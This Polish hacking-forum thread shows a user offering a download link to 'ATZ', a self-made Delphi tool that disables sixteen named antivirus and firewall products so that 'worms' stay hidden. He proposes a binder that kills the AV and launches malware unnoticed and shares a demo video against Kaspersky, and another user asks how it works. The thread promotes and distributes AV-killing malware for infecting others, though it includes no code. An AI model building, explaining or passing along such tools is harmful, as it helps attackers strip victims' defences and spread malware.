ATZ - Gdy AV nam przeszkadza

adikx

Użytkownik
Dołączył
Maj 21, 2007
Posty
415
Witam.

Dawno nie zaglądałem na forum.

Postanowiłem sklecić taki mały progosik pomagający ukryć naszego "robaczka" ;)

Po uruchomieniu program przygotowuje swoją bibliotekę, a po następnym restarcie nie ma już AV czy tam Firewalla. Działa tylko na określone, tzn. nie mam bazy wszystkich procesów. Ta wersja może zostać uruchomiona na localu nie zaszkodzi oprócz tego ,że dezaktywuje AV. Jeśli ktoś będzie chciał go przywrócić to proszę się ze mną skontaktować.

Lista działających:
Kod:
a-squared
AhnLab-V3
AntiVir
Avast
AVG
BitDefander
F-Secure
GData
Kaspersky
McAfee
Nod32
Norman
Panda
Norton
Outpost
Zone alarm

Jeśli będzie się podobał to mogę zrobić binder zabijający AV i uruchamiający nasze "robaczki" dzięki czemu nie będzie krzyku.

Download
Kod:
http://www.adikx.freehost.pl/atz.rar

Pozdrawiam AdiKX
 

Legalnl

Użytkownik
Dołączył
Październik 8, 2008
Posty
828
no ciekawy program tylko wydaje mi się ze szybko go wrzucą na liste zagrożeń. i to działa takze na takiego kasperskiego? bo jakoś nie wierze, kiedyś tez probowalem takie coś zrobić. Firewall to banał ale gorzej z antywirusem.
 

Legalnl

Użytkownik
Dołączył
Październik 8, 2008
Posty
828
hmmmm to swietna robota ;) mogłbyś zdradzić w jaki sposob ? bo chyba nie przez TerminateProcess() czy taskkill :D
 

adikx

Użytkownik
Dołączył
Maj 21, 2007
Posty
415
Ok. Postanowiłem nagrać wideło jak radzi sobie z kacprem.
Kod:
http://www.4shared.com/file/2PL5LUzL/atz_kaspersky.html
Jeśli chodzi o działanie to nie dodaje nic do autostartu ;) Nie kasuje ani 1 pliku oraz żadnego wpisu w rejestrze nie usuwa. Nie modyfikuje żadnego pliku chociaż jest załadowany do każdego procesu. Napisany ofc. w delphi. Chcesz coś więcej wiedzieć to PW.
 

adikx

Użytkownik
Dołączył
Maj 21, 2007
Posty
415
Ok sprawdzę i poprawię.
// To dopiero Beta Bety nie miałem czasu wszystkiego posprawdzać po prostu dodałem do listy procesów GData i wrzuciłem na VT.
 
Do góry Bottom